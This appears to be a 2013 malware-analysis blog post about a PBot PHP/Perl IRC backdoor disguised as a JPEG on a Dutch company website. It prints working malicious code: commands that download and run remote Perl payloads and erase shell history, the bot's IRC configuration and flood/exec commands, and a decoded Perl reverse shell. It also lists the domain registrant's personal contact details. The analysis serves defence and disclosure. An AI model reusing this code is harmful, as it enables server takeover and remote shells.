Friday, January 4, 2013

A PBot (PHP + Perl Backdoor IRC Bot + Network Attack Tool) Infection on hegeman.com

PBot is a remote IRC Protocol Bot for usually used for taking over the infected machine into network malicious tool for PortScanning, DoS + etc acts.
It has been a long time for analyzing an active PBot, our previous post abut Pbot are here>>[CLICK]. This new one just spotted accidentally in my watch this new year. I trailed back infection started from before Christmas and noted its activities until yesterday. There's nothing special about this infection instead the ignorance of the domain owner which I informed him by severeal times, without getting response nor removal act.

This PBot is a plain textual script, camouflage its filename with a JPEG file extension, yes it contains some severe malicious functionalities of PBot which people should know about.

Below is the capture of its GUI, if you know how to execute this well:
(click to enlarge the pic below)

Victim: hegeman.com, Infection method probability: credentials (90%), hacked (10%)
Contacts: (for alert information)
Registrant:
 Hegeman Nijverdal BV
 Postbus 224
 Nijverdal,  7440AE, NL
 Administrative Contact:
    Hoksbergen, B  b.hoksbergen@hegeman.com
    Postbus 224
    Nijverdal,  7440AE, NL +31.548611000
 Technical Contact:
    Diensten, Online  kpni@kpn.com
    Maanplein 55
    Den Haag,  2516CK, NL +31.8000403
Infected/Injected URLs:
h00p://hegeman.com/configs.jpg
h00p://hegeman.com/images/configs.jpg
h00p://hegeman.com/tmp/configs.jpg?
h00p://www.hegeman.com/configs.jpg
h00p://www.hegeman.com/images/configs.jpg
h00p://www.hegeman.com/tmp/configs.jpg
My log in downloading above url to get sample:
Resolving hegeman.com... seconds 0.00, 213.75.22.52
Caching hegeman.com => 213.75.22.52
Connecting to hegeman.com|213.75.22.52|:80... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5448 (new refcount 1).
GET /configs.jpg HTTP/1.0
Accept: */*
Host: hegeman.com
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Fri, 04 Jan 2013 07:34:48 GMT
Server: Apache/2.0.52 (Red Hat) FrontPage/5.0.2.2635
Last-Modified: Thu, 03 Jan 2013 00:44:47 GMT
ETag: "961813c-99e7-ab6eddc0"
Accept-Ranges: bytes
Content-Length: 39399
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg
200 OK
Registered socket 1896 for persistent reuse.
Length: 39,399 (38K) [image/jpeg]
17:39:35 (10.59 KB/s) - `configs.jpg' saved [39399/39399]
What looks like an image JPEG file is actually a script, to be executed under infected machine's PHP from remote via infected url. Let's see the significant malicious points of this script: The header of this PBot:
_/  |_ __ _____  ___       _____|  |__ _____     __| _/______  _  __
\   __\  |  \  \/  /      /  ___/  |  \\__  \   / __ |/  _ \ \/ \/ /
 |  | |  |  />    <       \___ \|   Y  \/ __ \_/ /_/ (  <_> )     / 
 |__| |____//__/\_ \_____/____  >___|  (____  /\____ |\____/ \/\_/  
                  \/_____/    \/     \/     \/      \/              
<br/><?
$dir = @getcwd();
echo "DON TUKULESTO <br>";
$OS = @PHP_OS;
echo "OSTYPE :$OS <br>";
echo "uname -a; $uname <br>";
$free = disk_free_space($dir);
$ob = @ini_get("open_basedir");
$df = @ini_get("disable_functions");
if( ini_get('safe_mode') ) {
   echo "SM: 1 \\ ";
It downloads the components from remote:
$url="h00p://miri.wap.sh/";
exec('cd /tmp;curl -O '.$url.'mild.txt;perl mild.txt;rm -rf mild.txt*;');
exec('cd /tmp;GET '.$url.'mild.txt > mild.txt;perl mild.txt;rm -rf mild.txt*;');
exec('cd /tmp;wget '.$url.'mild.txt;perl mild.txt;rm -rf mild.txt*;');
exec('cd /tmp;lwp-download '.$url.'mild.txt;perl mild.txt;perl mild.txt;rm -rf mild.txt*;');
exec('cd /tmp;fetch '.$url.'mild.txt >mild.txt;perl mild.txt;rm -rf mild.txt*;');
Or download from "other" server with varied method of execution like: exec, @popen, shell_exec, system, passthru, etc..., i.e.:
@popen('cd /tmp;wget '.$url.'perl.txt;perl perl.txt irc.indoforum.org;rm perl.txt*;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;curl -O '.$url.'perl.txt; perl perl.txt irc.indoforum.org;rm perl.txt*;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;lwp-download '.$url.'perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;lynx -source '.$url.'perl.txt >perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;fetch '.$url.'perl.txt >perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;GET '.$url.'perl.txt >perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
 :
This PBot has the connectivity contains the bad actor's IRC ID behind it:
var $config=array("server"=>"irc.javairc.org",  // ip/host da rede
                   "port"=>"6667",         // porta da rede
                   "pass"=>"",         // senha da rede
                   "prefix"=>"dos",         // nick do bot
                   "maxrand"=>"4",         // quantidade de numero no nick do bot
                   "chan"=>"#seve",         // canal que os bots vao entrar
                   "chan2"=>"#seve",     // canal aonde os bots v縊 mandar as vulns ao conectar (-n)
                   "key"=>"sempakz",      // senha do canal
                   "modes"=>"+p",              // modos do bot
                   "password"=>"sempakz",           // senha pra acesso (.user SENHA)
                   "trigger"=>".",         // prefico dos comandos
                   "hostauth"=>"@newbie.aja"         // host dos owners (* for any hostname)
Below are Pbot's (basic) commands, you'll see some remote act + TCP/UDP flood commands..
*  .user <password> //login to the bot
*  .logout //logout of the bot
*  .die //kill the bot
*  .restart //restart the bot
*  .mail <to> <from> <subject> <msg> //send an email
*  .dns <IP|HOST> //dns lookup
*  .download <URL> <filename> //download a file
*  .exec <cmd> // uses exec() //execute a command
*  .sexec <cmd> // uses shell_exec() //execute a command
*  .cmd <cmd> // uses popen() //execute a command
*  .info //get system information
*  .php <php code> // uses eval() //execute php code
*  .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
*  .udpflood <target> <packets> <packetsize> <delay> [port] //udpflood attack
*  .raw <cmd> //raw IRC command
*  .rndnick //change nickname
*  .pscan <host> <port> //port scan
*  .safe  // test safe_mode (dvl)
*  .inbox <to> // test inbox (dvl)
*  .conback <ip> <port> // conect back (dvl)
*  .uname // return shell's uname using a php function (dvl)
The callback is as per below function, to be saved+executed locally with perl (dc.pl):
function conback($ip,$port)
{
    $this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
    $dc_source = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KcHJpbnQgIkRhdGEgQ2hhMHMgQ29ubmVjdCBCYWNrIEJhY2tkb29yXG5cbiI7DQppZiAoISRBUkdWWzBdKSB7DQogIHByaW50ZiAiVXNhZ2U6ICQwIFtIb3N0XSA8UG9ydD5cbiI7DQogIGV4aXQoMSk7DQp9DQpwcmludCAiWypdIER1bXBpbmcgQXJndW1lbnRzXG4iOw0KJGhvc3QgPSAkQVJHVlswXTsNCiRwb3J0ID0gODA7DQppZiAoJEFSR1ZbMV0pIHsNCiAgJHBvcnQgPSAkQVJHVlsxXTsNCn0NCnByaW50ICJbKl0gQ29ubmVjdGluZy4uLlxuIjsNCiRwcm90byA9IGdldHByb3RvYnluYW1lKCd0Y3AnKSB8fCBkaWUoIlVua25vd24gUHJvdG9jb2xcbiIpOw0Kc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90bykgfHwgZGllICgiU29ja2V0IEVycm9yXG4iKTsNCm15ICR0YXJnZXQgPSBpbmV0X2F0b24oJGhvc3QpOw0KaWYgKCFjb25uZWN0KFNFUlZFUiwgcGFjayAiU25BNHg4IiwgMiwgJHBvcnQsICR0YXJnZXQpKSB7DQogIGRpZSgiVW5hYmxlIHRvIENvbm5lY3RcbiIpOw0KfQ0KcHJpbnQgIlsqXSBTcGF3bmluZyBTaGVsbFxuIjsNCmlmICghZm9yayggKSkgew0KICBvcGVuKFNURElOLCI+JlNFUlZFUiIpOw0KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV4ZWMgeycvYmluL3NoJ30gJy1iYXNoJyAuICJcMCIgeCA0Ow0KICBleGl0KDApOw0KfQ0KcHJpbnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
    if (is_writable("/tmp"))
    {
      if (file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
      $fp=fopen("/tmp/dc.pl","w");
      fwrite($fp,base64_decode($dc_source));
      passthru("perl /tmp/dc.pl $ip $port &");
      unlink("/tmp/dc.pl");
Whatever the above base64 hashed code is, never be good, Let's decode it to find out what it is.. end up w/the backdoor logic:
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
  printf "Usage: $0 [Host] <Port>\n";
  exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
  $port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
  die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
  open(STDIN,">&SERVER");
  open(STDOUT,">&SERVER");
  open(STDERR,">&SERVER");
  exec {'/bin/sh'} '-bash' . "\0" x 4;
  exit(0);
}
print "[*] Datached\n\n";
↑Now we know how this Bot connect motherships, this protocol can be used to send/receive data. The Virus Total detection ratio is not bad at all:
MD5: 06a940dd7824d6a3a6d5b484bb7ef9d5 File size: 38.5 KB ( 39399 bytes ) File name: configs.jpg File type: PHP Detection ratio: 29 / 46 URL:------>>[CLICK]
I wonder why the owner won't delete this script from the server.. For more research of the recent PBot infections, below are infected urls:
h00p://eskipazari・com/images/products/large/rabot.txt
h00p://www.bohmans・ru/netcat/modules/forum2/images/pbbb.txt
h00p://asiandogs.・u/dog/crime/byroe.jpg
h00p://agefocus・net/wp-includes/js/jcrop/six/star.jpg
h00p://myghost.myqr・sg/bbs/logs/rabot.txt
h00p://www.nenskinder・com/wp-content/rabot.txt
h00p://www.airsoftpark・com/custompatchimg/pa.txt
h00p://neverbeentobali・com/wp-content/rabot.txt
h00p://flickr.com.oyun-max・com/bot.txt

#MalwareMustDie!

1 comment: